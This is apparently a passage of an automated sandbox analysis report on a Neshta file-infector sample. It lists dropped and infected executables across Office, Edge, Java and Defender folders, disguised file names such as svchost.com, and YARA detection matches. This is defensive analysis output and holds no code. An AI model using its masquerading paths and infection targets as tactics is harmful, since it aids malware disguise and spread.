Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSC8B0546412F3A4425A5D7AA169F4D63A4.TMP

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9B890D77	1_2_00007FFD9B890D77
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9B8C1385	1_2_00007FFD9B8C1385
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9B8CCFF0	1_2_00007FFD9B8CCFF0
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9BC5115F	1_2_00007FFD9BC5115F
Source: C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe	Code function: 51_2_00007FFD9B8A0D77	51_2_00007FFD9B8A0D77
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Code function: 53_2_00007FFD9B890D77	53_2_00007FFD9B890D77
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 56_2_00007FFD9B870D77	56_2_00007FFD9B870D77
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Code function: 59_2_00007FFD9B890D77	59_2_00007FFD9B890D77

Source: SearchIndexer.exe	Binary or memory string: OriginalFilename vs SearchIndexer.exe
Source: SearchIndexer.exe, 00000038.00000002.2366729354.000000000363B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SearchIndexer.exe
Source: SearchIndexer.exe, 00000040.00000002.2799234596.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SearchIndexer.exe
Source: SearchIndexer.exe, 00000040.00000002.2799234596.0000000002B72000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SearchIndexer.exe
Source: SearchIndexer.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SearchIndexer.exe

Source: SearchIndexer.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: SearchIndexer.exe, type: SAMPLE	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: 0.0.SearchIndexer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Windows\svchost.com, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Windows\svchost.com, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Windows\svchost.com, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Windows Defender\SearchIndexer.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
